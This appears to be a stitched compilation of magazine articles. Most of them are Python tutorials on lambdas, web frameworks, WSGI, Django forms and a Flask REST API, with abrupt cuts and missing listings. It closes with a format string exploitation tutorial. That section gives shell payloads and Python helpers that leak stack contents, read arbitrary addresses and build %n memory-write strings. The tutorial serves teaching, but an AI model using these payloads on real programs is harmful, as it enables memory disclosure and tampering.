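except Exception:                 # catch-all default handler
    print "something unexpected happened"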
Now, as you saw, exception handling is pretty easy, huh? So is exception raising. Let's get back to Figure 15's code. The magic method overloading the sum operator was added to the Nest class, and if the other object isn't a Duck instance we were only printing something. That's not cool. So let's make it raise a real exception, as shown in Figure 19.
Summary
Python is a very good tool and does its job very well for those who value readability more than performance. And if you want to take every drop of performance that Python can give, you can try PyPy (an interpreter with a just-in-time compiler) or Cython (Python-like code that generates C code to get a real performance boost). When you code something in it, you will surely be able to return to your code a month later and still understand it, even more so if you follow good coding practices. It has plenty of useful built-in functions and an extensive, and well documented, standard library. Not to mention Python's community: everybody will be glad to help if you have any issue or problem. Unfortunately I can't write everything about Python here, so give the links below a try and learn more!
On the web
This article will look at more elaborate examples of the same basic idea.
That's the procedural way of doing things: initialize a variable, then incrementally update it in a specified sequence to accumulate the result. Now compare a more functional way:
This uses Python's list comprehensions to construct the entire result in a single expression. Much more compact, much closer to the natural-language explanation of what the code is doing ("output all of the integers from 0 up to, but not including, 100, which are even"), but more importantly, much more mathematical.
Mathematics is good, because it has evolved over centuries to help make clear the structure of things, allowing us to manipulate those structures, reason about them, and determine useful properties of them. As programmers, it behooves us to benefit from this accumulated wisdom; both styles are sketched side by side below.
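For concreteness, here are both styles for the evens-under-100 example described above:

# procedural: accumulate step by step
result = []
for i in range(100):
    if i % 2 == 0:
        result.append(i)

# functional: one expression
result = [i for i in range(100) if i % 2 == 0]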
(If cond, then evaluate expr1, else evaluate expr2.) For some reason, Python didn't adopt this form when it added conditional expressions in version 2.5; instead, it went for
expr1 if cond else expr2
Personally, I find this ugly, though I have been (grudgingly) using it in a few cases. Initially I started out using a form like this:
(expr1, expr2)[cond]
which constructs a tuple of the two expressions and uses cond as an index to select between them. This works if cond is boolean-valued (which I always ensure as a matter of course anyway), or at least evaluates to one of the integers 0 or 1. But the problem is that both expr1 and expr2 are always evaluated. For example, consider the expression
o.c if o != None else None
being rewritten as
(None, o.c)[o != None]
The problem with the latter form is that it will fail with AttributeError: 'NoneType' object has no attribute 'c' if o happens to be None, because the o.c expression is still being evaluated in this case.
Just by sticking lambda : in front of each expression, this becomes a choice between two functions of no arguments
depending on whether o is equal to None or not: the first one evaluates to the right result when o is equal to None,
the second one when it is not equal to None.
Why lambda? Using lambda is just a convenience. You could equally rewrite the above by adding the following ancillary definitions (the second one being the obvious counterpart of the first) and selecting between them:
def f1() :
    return None
#end f1

def f2() :
    return o.c
#end f2

(f1, f2)[o != None]()
which, you will agree, is a bit more long-winded. Using lambda just shortens the whole process and avoids introducing a proliferation of single-use names. To evaluate a function of no arguments, just put a pair of empty parentheses after it:
(lambda : None, lambda : o.c)[o != None]()
Et voilà! This only evaluates the selected function, giving us the lazy-evaluation semantics we need. Which the built-in conditional-expression construct gave us for free anyway. So this seems like a lot of work to go to just to avoid using that, doesn't it?
Which may be true, but wait till you see what else you can do with these lambdas...
where the selector was an integer-valued expression, so choice1 was picked when the selector was 1,
choice2 when it was 2, and so on, with the (optional) defaultchoice being picked when the selector didnt
correspond to any of the previous choices. Like most constructs in ALGOL-68, this could be used
as either a statement (selecting from alternative choice statements to be executed) or an expression
(selecting from alternative choice expressions to evaluate).
If you're familiar with C-like languages, you're likely expecting to see something more like
switch (selector)
{
case 1:
    choice1
    break;
case 2:
    choice2
    break;
default:
    defaultchoice
    break;
} /*switch*/
where the applicable selector value for each choice is given explicitly, rather than implicitly by ordering. This is the more usual form nowadays. But C and most of its derivatives never offered the use of such a construct in expressions, only statements.
Python doesn't offer either statement type, but it's easy enough to construct conditional expressions of either form, using the same lambda trick we saw above. To do ALGOL-68-style implicit case ordering, select from a tuple of functions:
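A sketch of the construct being described (choice1 etc. are placeholders, as in the surrounding text):

(
    lambda : choice1,
    lambda : choice2,
    lambda : choice3,
)[selector - 1]()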
(The subtraction of 1 is because the ALGOL-68 selection is 1-based, whereas array indexing in Python and other C-like languages is 0-based.) This looks the same as the previous construct for selecting from two options, just generalized to more than two options, chosen by an integer-valued expression, numbered from 0. Note however that there is no option for a defaultchoice in this construct. To do more modern explicit case selection, use a dictionary:
{
    1 : lambda : choice1,
    2 : lambda : choice2,
}[selector]()
where the dictionary keys stand in for the case labels. To add a default choice, for when the selector doesn't match any of the explicit keys, use the get method:
{
    1 : lambda : choice1,
    2 : lambda : choice2,
}.get(selector, lambda : defaultchoice)()
The nice thing is that you are not limited to integer selectors as in C or ALGOL-68; you can use strings, or indeed any immutable Python type. For example, here is a routine I wrote as part of a script for parsing Blender documents (available here: https://github.com/ldo/blendparser). It uses the type of the argument expression to select the right formatting expression to use; if this is not one of a set of known types, then it is assumed to be a dictionary containing a "name" entry which is the type name.
def type_name(of_type) :
    # returns a readable display of of_type.
    return \
        {
            PointerType : lambda : type_name(of_type.EltType) + "*",
            FixedArrayType : lambda : "%s[%d]" % (type_name(of_type.EltType), of_type.NrElts),
            MethodType : lambda : "%s (*)()" % type_name(of_type.ResultType),
        }.get(type(of_type), lambda : of_type["name"])()
#end type_name
Note the recursive invocation to handle pointer-to-type, array-of-type and function-returning-type. Primitive
Blender types are represented in the script by dictionary objects.
Summary
The beauty of Python is that the core language is so small, yet so powerful. It may not have quite the
capability for writing mind-bending constructs that, say, Perl offers. Which is probably just as well. But there
are still a few opportunities to get creative...
Frameworks
When developing a web application or a web service, you may choose to write it from scratch using the libraries that come with the Python distribution, or you may use a framework. A framework may save you a lot of time, but it comes with a learning curve. Django is the most complete framework and suitable for developing a full web application, but it may not be the best option if all you need is to write a simple web service; in this case, Web.py may be your best choice. In the end, the decision depends on what you need to build, what you and your team already know and the time frame you have for the project. In this section, we will present the main framework options and show a simple hello example for each, in order to help you choose the best framework for your project.
Web.py
web.py is a small web framework that aims at simplicity and not getting in the way. It is currently used by Yandex, according to its website. Mainly, it consists of a regular-expression-based url routing map and classes that serve requests through methods named after the HTTP request method in use. Let's look at a simple example in Listing 1.
Listing 1. Simple web.py example
import web

class MyService:
    def GET(self, name):
        return "Hello {0}".format(str(name))

urls = ('/(.*)', 'MyService')
app = web.application(urls, globals())

if __name__ == "__main__":
    app.run()
In the example, all requests will return the string "Hello <uri>", where <uri> is replaced by whatever is sent in the url after the server name/port. Uris are mapped by a tuple:
urls = ('/(.*)', 'MyService')
The mapping consists of pairs of elements in the tuple: a uri regexp and a class that provides a handler function. If you need to map more uris, you can just insert them in the tuple, as you can see in Listing 2.
Listing 2. Mapping uris to handler classes
urls = (
    '/', 'MyService',
    '/users/(.*)', 'MyUsersService',
    '/groups/(.*)', 'MyGroupsService',
)
Every request to a uri will create a new instance of the class associated with it. Within the object, the application will search for a function with the same name as the request method (GET, POST, etc.). This function must return a string containing the response body.
Twisted is a full-featured, event-driven networking engine. It provides, among many features, an HTTP server. It is currently being used in many projects.
While being a very powerful networking and web framework, Twisted may be intimidating due to the overly technical (or, sometimes, the lack of) documentation.
In Twisted you must define a class inheriting from Resource which will handle requests. A Resource is then associated with a Site. You may route different Resources by associating them as children of a root resource. In Listing 3, you can see how the same example presented in web.py looks in Twisted.
Listing 3. Simple twisted example
from twisted.web import server, resource
from twisted.internet import reactor

class MyServiceResource(resource.Resource):
    isLeaf = True

    def render_GET(self, request):
        request.setHeader("content-type", "text/plain")
        return "Hello {0}".format(request.path[1:])

if __name__ == "__main__":
    factory = server.Site(MyServiceResource())
    reactor.listenTCP(8080, factory)
    reactor.run()
In the example above, all requests will return the string "Hello <uri>", where <uri> is replaced by whatever is sent in the url after the server name/port, for any uri accessed.
Every request to a uri will use the same instance of the class associated with it. Within the object, the application will search for a function whose name consists of render_ plus the request method (render_GET, render_POST, etc.). This function must return a string containing the response body.
isLeaf is a variable set to indicate the end of the resource call chain. Resources may be set as children of another resource using putChild.
To access a resource at the url /service or /custom you must set up a root resource and insert a child for each url. That is called resource nesting and it is presented in Listing 4.
Listing 4. Resource nesting with twisted
if __name__ == "__main__":
    root = Resource()
    root.putChild("service", MyServiceResource())
    root.putChild("custom", MyCustomResource())
    factory = server.Site(root)
    reactor.listenTCP(8080, factory)
    reactor.run()
SimpleHTTPServer
Originally built to serve files from a directory, SimpleHTTPServer is an HTTP server normally distributed with Python. It is a great tool for environments where you can't add an extra package to the default Python installation. It does not provide a networking interface by itself, so we must wrap the handler using a SocketServer.
    def do_GET(self):
        self.send_response(200, "OK")
        self.send_header("Content-Type", "text/plain")
        self.end_headers()
        self.wfile.write("Hello {0}".format(self.path[1:]))
Django
Django is the most complete web development framework available for Python. It includes an object-relational mapper, an admin interface, a template system, a cache system and many tools to help with common web-development needs like authentication, logging and internationalization. To create a Django project, we start with django-admin startproject myproject, where myproject should be replaced by your project name. After running this command, a folder called myproject will be created with a structure as shown in Figure 1.
The first thing to do is to add your app to the INSTALLED_APPS list in the settings.py file. Then we edit the urls.py file, where the URLConf module is located; it contains a mapping from URL patterns to Python callback functions. Listing 6 shows what it looks like for the Hello app.
Listing 6. URL Conf example
from django.conf.urls import patterns
from hello import views

urlpatterns = patterns('',
    (r'^(.*)$', views.hello),
)
Now that the coding is finished, you can run it using python manage.py runserver.
As you can see, with Django it takes more work to write a simple example; however, if you have a more complex application, using it will really pay off.
Flask
Flask is a micro-framework with a built-in server and debugger, unit test support and a template system based on Jinja2. Flask uses decorators to define the url mapping, the functions that should be executed before a request, and many other things. In the hello example, we use the decorator @app.route(rule) to tell Flask that the decorated function should be executed when a request to a uri that matches the rule is made. The rule may contain parameters, which need to be marked using < and >. In our hello example, we use the data variable to capture the string that will be concatenated to "Hello". As we may want to call it without any data, we also need to add a route with a default value for data, as you can see in Listing 9.
Listing 9. Hello in Flask
from flask import Flask

app = Flask(__name__)

@app.route('/<data>')
@app.route('/', defaults={'data': ''})
def hello(data):
    return "Hello " + data

if __name__ == "__main__":
    app.run()
Sample Application
Our sample application consists of a simple page that displays stock quotes for a selected list of stocks. We decided to build the web application using Django, because it is the most popular Python web framework. The web application consumes web services written in Twisted, which is overkill for such an application; we did it this way just to show you how it can be done if your application demands more layers. Stock quotes are obtained using Yahoo's public finance API, and all configuration options are stored in a sqlite database. Figure 2 shows how these components communicate.
Webservice
The webservice was built using Twisted because of the powerful tools it provides and to prevent a handler instance allocation per request. Our webservice consists of a database handler and two url locations: /setting/ to store and retrieve application settings, and /stock/ to add stocks and retrieve their quotes. As shown in the Twisted example, these url locations are handled by resources, which in our case we called MyServiceSettings and MyServiceStocks.
You can check them in detail on GitHub. The database handler contains methods that perform all the database operations we need. Listing 10 shows an excerpt with the add_stock method.
Once we have the Database handler method, we can write the web-service method. For the add_stock
example, it will be a POST request with a url /stock/<SYMBOL>, where <SYMBOL> is replaced by the actual stock
symbol. The resource handles this request, parses the stock symbol and calls the add_stock method. Listing 11
shows how this is done.
Listing 10. Database handler add_stock method
import sqlite3

class MyServiceDatabase():
    """Database handler class"""

    def __init__(self, db="database.db"):
        """Open database"""
        self.conn = sqlite3.connect(db)

    def add_stock(self, symbol):
        """Add a stock to the portfolio"""
        self.conn.execute("INSERT INTO portfolio(symbol) VALUES(?)", (symbol,))
        self.conn.commit()
try:
    self.db.add_stock(stock)
except (TypeError, ValueError, KeyError, sqlite3.IntegrityError) as e:
    result = {"status": "error", "message": e.message}
return json.dumps(result)
Application
As in our hello example, the first thing we did was add the module to the INSTALLED_APPS list in settings.py, then edit urls.py to set the index page. We also created a views.py file which contains the index page and must be imported by urls.py, in which we set up the url routing. We defined two paths: the default, where we call the index method, and remove/<SYMBOL>, where we call the remove_stock method. The urls.py can be seen in Listing 12.
Listing 13. add_stock excerpt from models.py
from httplib import HTTPConnection

class Stock():
    """Model for webservice's stock data"""

    def add_stock(self, stock):
        """Add a stock to the webservice"""
        conn = HTTPConnection("localhost", 8080)
        conn.request("POST", "/stock/{0}".format(stock))
        response = conn.getresponse()
        if response.status != 200:
            raise Exception(response.read())
        return True
The view contains the methods that perform the business logic, in our case consuming the webservices. When accessing a url, Django will check the url mapping set up in urls.py and use the matching view to service the request. A view must respond with an HttpResponse or an exception; the response may be constructed using an html template filled with data from our model using the Django template language.
Django is a database-oriented framework; since our data interaction is handled through a webservice, we must implement a custom model class instead of using the default models provided by Django. Our model will add, remove and list stocks from the webservice through simple httplib requests. In Listing 13, we show how adding stocks looks.
To implement the view, we use the model, which in turn consumes the webservice. Listing 14 shows views.py. Note that the index method may call add_stock if the request method is POST; otherwise it will just list stocks. The method list_stocks belongs to the model; even though it is not in Listing 13, you can find it on GitHub.
Finally, an index.html page was developed using the Django template language to display the stocks recorded in the context, and to provide a form so that the user can add more stocks.
Deploying
Once your application is ready, it is time to deploy it. You have quite a lot of different options to put your project in production, but most of them fall into one of two categories. In one category you have options like dedicated servers, VPSes or cloud IaaS like Amazon AWS. With these options you will need to manage not just your application but also the servers where it will run. This approach has the downside of overhead on the system administration side, but on the other hand you have full control over the software and can be sure that, no matter how your project was developed, you will be able to deploy it.
The other hosting category is the shared hosting environments and PaaS offerings like Google App Engine or Heroku. The advantage of this kind of hosting is that there are no servers to be administered; all the administration burden is in the hands of the service provider. The main downside (and sometimes a complete deal breaker) is that you will need to adapt your application to the provided environment. Some service providers allow a certain level of customization of the environment while others offer none. It is also not uncommon that they just don't have your framework, or the version of your framework of choice, available to be installed.
Because of the differences in environments among the shared/PaaS category of hosting providers, we will focus on the deployment of a Python application on a dedicated/VPS/IaaS server.
Now, to set up your Django/Flask application, create another file in the /etc/supervisor/conf.d directory using the configuration example in Listing 16, changing the uppercase strings as needed.
After creating the Supervisord configuration files, run the command sudo service supervisor start to start Supervisord and let it start your configured applications. By default, Supervisord on Ubuntu is already set to start and stop during system boot and shutdown.
Please note that deploying an application to a production environment is a complex task, and the tools outlined above have many configuration options that were not explored for the sake of brevity. With this in mind, it is strongly advised to study the tools further and get familiar with the best practices of each of them before really going live with your application.
Summary
In this article, we showed a couple of Python web frameworks and how they can fit together to build a simple application. Choosing a framework can be tricky, as it may limit your deployment options and impact your learning curve and development performance. As a rule of thumb, if you don't know any of the frameworks: if the application is really, really simple, use Web.py; if it is simple, use Flask; if it is complex, use Django. Unless you have a strong reason, you should not use SimpleHTTPServer. Twisted is very scalable and very high-performing, but it is very hard to use; it should be your choice when you need to integrate and/or implement some protocol from scratch, where there is no packaged solution available.
On the Web
Glossary
It's all about the way you write. The application side
WSGI applications must follow the protocol to understand what the web server commands and what to feed back. Between the web server and the application sits something called the application server.
But let's start with the application side. Basically, our application needs to receive two arguments, a dictionary and a callback function, and must respond with an iterable containing the response body:
# app.py
def my_first_wsgi_app(environ, start_response):
    response_body = "Hello World"
    status = "200 OK"
    response_headers = [
        ("Content-Type", "text/plain"),
        ("Content-Length", str(len(response_body))),
    ]
    start_response(status, response_headers)
    return [response_body]
In parts:
environ contains environment variables;
start_response is a callback function used by the application to send HTTP headers to the server;
response_headers is a list of tuples, containing the headers that we will send to the server;
we call start_response and send all the HTTP headers to the server;
we return an iterable with the content; in this case, we are using a list.
Pretty simple, huh?!
Not a single line of code of our application has changed, and we can serve it on many different servers. This is the beauty of WSGI; a minimal example follows.
As you can see, using WSGI is beneficial to your project design. The pieces are weakly coupled, and each can be replaced without touching the others.
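For instance, the standard library's wsgiref server can run the app unchanged (a sketch; the module and application names follow the earlier snippet):

# serve.py
from wsgiref.simple_server import make_server

from app import my_first_wsgi_app

# serve the exact same application with the stdlib WSGI server
httpd = make_server("localhost", 8000, my_first_wsgi_app)
httpd.serve_forever()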
Summary
When you use Django, for example, you really don't need to concern yourself with the integration between your application and the application server. Frameworks are responsible for that, and they do it very well. But it's necessary to know what is going on and what path a request follows until it gets to your application.
With the WSGI specification you can combine different frameworks with different application servers, adding your favorite web server on top. It's easy, it's modular. That is why it makes our lives better.
On the Web
http://www.python.org/dev/peps/pep-0333/ The Python Enhancement Proposal that describes the WSGI protocol
http://gunicorn.org/ A Python WSGI HTTP server for Unix
http://projects.unbit.it/uwsgi/ A high-speed WSGI server
http://code.google.com/p/modwsgi/ A Python WSGI adapter module for Apache
Until this point, the Django development process has been fairly standard: the schema has been designed as per the requirements and translated into models using the ORM. Now comes the next step, the creation of forms, which is where we will encounter some magic!
As I had promised, we are not going to attach the models _directly_. Create shipping_info/forms.py (Listing 2).
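Listing 2 is not reproduced here; based on the model used later in this article, a minimal ModelForm would look something like this (the form class name is an assumption):

from django.forms import ModelForm

from shipping_info.models import ShippingDetails

class ShippingDetailsForm(ModelForm):
    class Meta:
        model = ShippingDetails   # the form fields are generated from the model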
Now to create the templates, we shall create a file called shipping_info/templates/address.html and fill it with
the following:
<form action="/address/" method="post">
{% csrf_token %}
Now, after configuring your urls.py to include this app with its view functions, you should be able to run your Django project. Specifically, the urls.py file should read as follows:
from django.conf.urls import patterns, include, url

urlpatterns = patterns('',
    url(r'^address/', 'shipping_info.views.fill_form', name='address'),
    url(r'^success/', 'shipping_info.views.success_page', name='success'),
)
On pointing your browser at localhost:8000/address, you should see your form rendering successfully. Yes, it was that simple!
But wait, we still have to create the success page so that you know your form has successfully submitted the values.
In shipping_info/views.py, add the following view function:
def success_page(request):
    return render(request, 'success.html')
You don't believe me? Enter valid values in the form and press submit. You can now either go to your database shell directly or use the Django shell to access the database and see the input values.
The following steps outline how you can perform this from the Django shell:
$ python manage.py shell
>>> from django.db import models
>>> from shipping_info.models import *
>>> latest_user = ShippingDetails.objects.latest('name')  # to get the latest user saved into the database
>>> name = latest_user.name    # to get the name of that user
>>> city = latest_user.city    # to get the city of that user
>>> phone = latest_user.phone  # to get the phone number of that user
>>> user_object = ShippingDetails.objects.get(name='put your name here')
Conclusion
As you can see, using ModelForms makes working with forms a simple process. It also tightly binds the forms to the models, which is where the data gets stored.
Further Reading
http://pydanny.com/core-concepts-django-modelforms.html
http://www.slideshare.net/shawnrider/django-forms-best-practices-tips-tricks
https://docs.djangoproject.com/en/1.5/topics/forms/modelforms/
Thank you!
What is a microframework?
A microframework intends to be as simple as possible and generally provides the following:
Handles HTTP requests and responses
Small template engine
URL Routing
Sessions
Just as an example, if you look at Django, it has the following out of the box:
Handles HTTP requests and responses
URL Routing
Powerful template engine
ORM (Object-Relational Mapper)
Admin Interface
Sessions
Flask
Flask is a microframework created by Armin Ronacher (also known as Mitsuhiko) that started as an April 1st joke (you can read more about it in the link "Opening the Flask") and describes itself as "a microframework for Python based on Werkzeug, Jinja 2 and good intentions".
It supports the following out-of-the-box:
The excellent Jinja2 template engine
Werkzeug, a utility library for WSGI (read more here: http://werkzeug.pocoo.org/docs/tutorial/#step0-a-basic-wsgi-introduction)
Let's see an example of a Flask application; but first, let us create a virtual environment for our tests using virtualenv and virtualenvwrapper:
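The commands would be along these lines (assuming virtualenvwrapper is already sourced in your shell):

$ pip install virtualenv virtualenvwrapper
$ mkvirtualenv flask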
Note the (flask) marker on my shell prompt: it means that I'm using the virtual environment that we created. Now we need to install Flask, so let's do this:
(flask)$ pip install Flask
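With Flask installed, a minimal hello application along these lines can be saved as flaskapp.py and run with python flaskapp.py:

from flask import Flask

app = Flask(__name__)

@app.route("/")
def index():
    return "Hello World"

if __name__ == "__main__":
    app.run()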
Now open a browser and you will see a Hello World message:
Everything all right? Well, let's make something cooler than just the Hello World. Now suppose we need to create a RESTful webservice (thanks to Miguel Grinberg for the idea) to add, delete and list our preferred books.
It is important to plan how you will expose your service, because once you publish it and users start to consume your API, it will be harder to change the URLs. It is possible, but it will give you some headaches because you can leave your consumers without data.
In our case, here is some explanation; but remember it is not set in stone, you can design your API URLs as you please:
After defining the URL, here is some information about the HTTP methods that we are going to use, the URI
that will be exposed and their actions:
HTTP Method   URI                                                 Action
GET           http://[hostname]/catalog/api/v1/books              Retrieve a list of books
GET           http://[hostname]/catalog/api/v1/books/[book_id]    Retrieve a book
POST          http://[hostname]/catalog/api/v1/books              Create a new book
PUT           http://[hostname]/catalog/api/v1/books/[book_id]    Update an existing book
DELETE        http://[hostname]/catalog/api/v1/books/[book_id]    Delete a book
For the sake of the length of this article, we will just retrieve a list of books, retrieve a single book and create a new book, ok?
Now that it is clear what we need to do, let's do some coding: open the flaskapp.py file and make the following changes:
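A sketch of these changes (the sample book data is made up for illustration):

from flask import Flask, jsonify

app = Flask(__name__)

books = [
    {"id": 1, "title": "A Study in Scarlet", "author": "Arthur Conan Doyle"},
    {"id": 2, "title": "Dune", "author": "Frank Herbert"},
    {"id": 3, "title": "Neuromancer", "author": "William Gibson"},
]

@app.route("/catalog/api/v1/books", methods=["GET"])
def get_books():
    # return the whole catalog as JSON
    return jsonify({"books": books})

if __name__ == "__main__":
    app.run(debug=True)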
Now let's run the application; you should see something like this:
Nice, huh! Now let's add the code to get just one book. First, we need to add an import for the abort helper of Flask, so add it to the first line. Then let's add the method that will give us just one book, or a 404 error if the book does not exist; a sketch follows:
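Continuing the flaskapp.py sketched above:

from flask import Flask, jsonify, abort   # abort added to the import line

@app.route("/catalog/api/v1/books/<int:book_id>", methods=["GET"])
def get_book(book_id):
    matches = [b for b in books if b["id"] == book_id]
    if len(matches) == 0:
        abort(404)   # no such book
    return jsonify({"book": matches[0]})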
Let's test it again. Access the following url: http://127.0.0.1:5000/catalog/api/v1/books/1 and you should see something like this:
Well, now let's test with a book that does not exist: access the following url: http://127.0.0.1:5000/catalog/api/v1/books/99.
And now, let's add the code that will use the HTTP POST method to allow us to create new books; a sketch:
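Again assuming the flaskapp.py sketched above (request is Flask's request proxy):

from flask import request

@app.route("/catalog/api/v1/books", methods=["POST"])
def create_book():
    if not request.json or "title" not in request.json:
        abort(400)   # malformed request
    book = {
        "id": books[-1]["id"] + 1,
        "title": request.json["title"],
        "author": request.json.get("author", ""),
    }
    books.append(book)
    return jsonify({"book": book}), 201   # 201 Created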
Ok, now that we have the method, let's test it: open a console/terminal and type the following curl command:
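A curl invocation along these lines exercises the new endpoint (the book data is illustrative):

$ curl -i -H "Content-Type: application/json" -X POST \
       -d '{"title": "The Hobbit", "author": "J. R. R. Tolkien"}' \
       http://127.0.0.1:5000/catalog/api/v1/books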
Now let's see in the browser if everything went as planned; access http://127.0.0.1:5000/catalog/api/v1/books/4 in your browser:
Hooray! It is like Colonel John "Hannibal" Smith of the A-Team used to say: "I love it when a plan comes together."
So we learned how to create a simple RESTful API using just Flask, and it was quite an easy task. But it could have been even easier: you can use the excellent Flask-RESTful extension, along with the splinter acceptance testing tool, to ensure that your API works as intended.
What about other microframeworks? Let's look briefly at other options that deserve some attention when working on this kind of application.
Now, let's create a file called app.py in this directory and add the following code to it (a sketch follows):
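A minimal Bottle application matching the /hello/<name> url used below:

# app.py
from bottle import route, run, template

@route("/hello/<name>")
def hello(name):
    return template("<b>Hello {{name}}</b>!", name=name)

run(host="localhost", port=8080)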
Now just execute the app.py file using the following command:
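That command is simply:

$ python app.py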
Note that I did not create a virtual environment; we are using the bottle.py file that we downloaded from GitHub.
Open your browser on http://localhost:8080/hello/developer and you will see the following:
Article Links
Introduction
Format string attacks are not particularly new. Since their widespread publicization in 2000, format string vulnerabilities have picked up in intensity as buffer overflows become less common and more widely known. From an unknown start a decade ago, they have become a common means of exploiting system applications. These vulnerabilities remain an issue, and we still teach them; we can see from the 2010-06-30 advisory "KVIrc DCC Directory Traversal and Multiple Format String Vulnerabilities" that format string vulnerabilities have not disappeared and are still a valid topic today.
We will start by explaining what a format string actually is and then why format strings can be exploited.
It is not uncommon for format string vulnerabilities to allow the attacker to view all the memory contained within a process. This is useful as it aids in locating desired variables or instructions within memory. With this knowledge, an attacker can successfully exploit the vulnerability and even bypass controls such as Address Space Layout Randomization (ASLR).
When a parent process starts, the addressing for that process, as well as for all subsequent child processes, will in most implementations remain static throughout the lifetime of the process. Although an attack may crash a child process, the parent process is often left intact. Consequently, attacks against child processes that cause a crash of a particular thread or fork may still return useful information. This is particularly true when multiple format string attacks can be leveraged against child processes that respawn without crashing the parent application.
Many Linux implementations incorporate a process limit in order to restrict the number of re-spawns, and this can help minimize the impact of the attack noted above, by enforcing an RLIMIT_NPROC rlimit (resource limit) on a process through the Linux kernel. In this case, where the executable attempts to fork and more forks would come into existence than are allowed by RLIMIT_NPROC, the fork fails. The Linux kernel module rexFBD, when installed, detects excessive forking and stops it.
The end result is that memory leaks, including format string vulnerabilities, can act as a means of locating particular libraries and variables within a running process. The locations of both stack and heap variables may be determined. From this, the attacker can discover the structures contained within a program.
printf(buff);        /* vulnerable: user input used directly as the format string */
printf("%s", buff);  /* safe: explicit format specifier */
This is the same code we looked at above in our small program snippet. All that is missing is the "%s" in the printf() function, and we have left our program vulnerable to exploitation by attackers.
The issue with functions such as printf() is that the format string's variable arguments are passed on the stack in reverse order. The printf() function parses any input it has received up to the point where a format character is found. The function then locates the corresponding argument on the stack based on the index of the format character it has received.
A malicious user can specifically formulate an input value that includes format characters. The printf() function will look up and return prior data that exists on the stack. In this way, a malicious user can successfully retrieve data that is held within the stack. If we compile and run our code segment, we can see this in action.
When run by a normal user not attempting to exploit our code, the program runs as follows: see Figure 3.
As we stated, it runs OK when a normal, non-malicious user enters the form of data that the developers expected to receive. Even with the warning, many developers fail to act and leave the code vulnerable to attack. The compiler will warn you of the error, but it will not stop you from creating vulnerable code.
The problem is not use-case testing, it is abuse-case data. If, for instance, we send a string of format characters as input to our program, we see something wrong has occurred. An attacker can use this vulnerability to effectively read the stack (in this example we have turned off ASLR by echoing 0 to /proc/sys/kernel/randomize_va_space).
localhost:~$ ./Format_Exploit AAAA %x %x %x %x
AAAA bfb54630 0 b7781b40 1
localhost:~$ ./Format_Exploit
AAAA%8x.%8x.%8x.%8x.%8x.%8x.%8x.%8x.%8x
AAAAbffff973.bffff7a4.bffff7e0.bffff834. 804825d.f63d4e2e.
0.41414141.2e783825
The string argument that is passed to the printf() function is held in the stack frame just preceding the printf() function's call. The stack is a last in, first out (LIFO) abstract data structure. We can think of it as a pile of plates in a restaurant: the last plate placed on the pile is the first one taken off for re-use. So it is with the memory stack as well; the last entry pushed onto the stack is the first one popped off of it.
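The same behaviour in miniature, sketched with a Python list standing in for the memory stack:

stack = []
for plate in ["first", "second", "third"]:
    stack.append(plate)   # push a plate onto the pile
print stack.pop()         # -> "third": last in, first out
print stack.pop()         # -> "second"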
When we sent the format characters AAAA %x %x %x %x as input, we had a small section of the stack returned to us. Next, we entered AAAA%8x.%8x.%8x.%8x.%8x.%8x.%8x.%8x.%8x and, as can be seen in Figure 4, we have even more of the stack returned. Note that the second-to-last %x has output our leading AAAA (displayed in hex as 41414141).
An attacker can print as little or as much information from the stack as they desire simply by repeating the format string arguments. A simple programming error, where the programmer forgot to include the correct specifiers, allows an attacker to create and inject their own. The value 41414141 references the string AAAA we entered and indicates that the eighth argument is being read from the start of our format string. The value 8 we entered in each specifier sets the minimum field width of the argument (the output could be larger).
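As a hedged sketch, this probing can be automated in Python. We assume the vulnerable binary is the ./Format_Exploit used in this article and that it passes its first argument to printf():

import subprocess

def probe_stack(depth):
    # "AAAA" marks our own input; each %8x prints one word from the stack
    payload = "AAAA" + ".%8x" * depth
    return subprocess.check_output(["./Format_Exploit", payload])

# Walk progressively deeper until our marker (41414141) appears
for depth in range(1, 10):
    print "%2d words: %s" % (depth, probe_stack(depth).strip())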
Say we wish to read the memory at an arbitrary location of our choosing, for example 0xDEADBEEF; using this vulnerability, we can. Add the address we want to read from memory in reverse byte order (for a little-endian system) to the beginning of a string. Follow this with eight stack reads (%8x) and finish the string with a %s format character in the 9th position to dereference our planted address (and oops... a core dump, since this address is not mapped).
./Format_Exploit $(printf "\xef\xbe\xad\xde")%8x%8x%8x%8x%8x%8x%8x%8x%s
Segmentation fault (core dumped)
Let's start by looking for a valid location. Start GDB with the command gdb ./Format_Exploit. Using the %s format specifier, we will be able to display some data from the stack at a memory location of our choice; we begin examining memory at the value 0x8048220.
You should notice libc.so.6 at location 0x804822c and __libc_start_main at 0x804825d. We will now use this address in our format string to display it from our buggy program.
./Format_Exploit $(printf "\x5d\x82\x04\x08")$(python -c 'print "%08x+"*4')%s
\x5d\x82\x04\x08bffff978+bffff7a4+bffff7e0+bffff834+__libc_start_main
Here we have typed our format string \x5d\x82\x04\x08%08x+%08x+%08x+%08x+%s; the four leading bytes are our target address echoed back, followed by four stack words and, finally, the string read from 0x804825d.
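The same read can be scripted. A minimal sketch, again assuming the ./Format_Exploit binary from this article; the number of %08x pops matches the run above and would have to be re-probed on another system:

import struct
import subprocess

def read_string_at(addr, pops=4):
    # Plant the target address (little-endian), print `pops` stack words
    # with %08x, then dereference the planted address with %s.
    payload = struct.pack("<I", addr) + "%08x+" * pops + "%s"
    return subprocess.check_output(["./Format_Exploit", payload])

# 0x804825d held the __libc_start_main string on our test system
print read_string_at(0x0804825d)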
Writing to Memory %n
To really exploit format string vulnerabilities, we do not simply wish to read a value from memory (although this is important when seeking passwords and other data). In place of the %s noted in the previous section, using %n will overwrite memory locations. An attacker can use this to modify values stored by the program (for instance, changing the value of a financial transaction).
A number of controls have been developed to minimise the effects of vulnerabilities that can write to memory, such as buffer overflows and format string attacks. These include address obfuscation through randomizing the absolute locations of all code and data, Data Execution Prevention and even stack canaries, but we are not looking into these in this article.
In order to do this, we will use the following format specifiers:
%n
%#x (where # is a field width)
The %x specifier is very important as it allows us to regulate how many characters are written by the printf() function we are exploiting. When you specify a format character, you can provide an integer for the field width (e.g. %3x would be width 3). We use the %n specifier to overwrite the integer value at the target address, a single byte at a time.
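Below is a hedged sketch of the arithmetic involved, under the same assumptions as before; the function name and parameters are illustrative only, and the stack offset must be found by probing as shown earlier:

import struct

def build_write_payload(target, value, offset):
    # target: address of the integer we want to overwrite
    # value:  number %n should store (must exceed the bytes already printed)
    # offset: which conversion reaches the start of our input on the stack
    addr = struct.pack("<I", target)     # four address bytes, printed verbatim
    pops = "%8x" * (offset - 2)          # each prints at least 8 characters
    printed = len(addr) + 8 * (offset - 2)
    pad = value - printed                # width of one final %x; %n then stores
    assert pad > 0                       # the running character count = value
    return addr + pops + "%" + str(pad) + "x%n"

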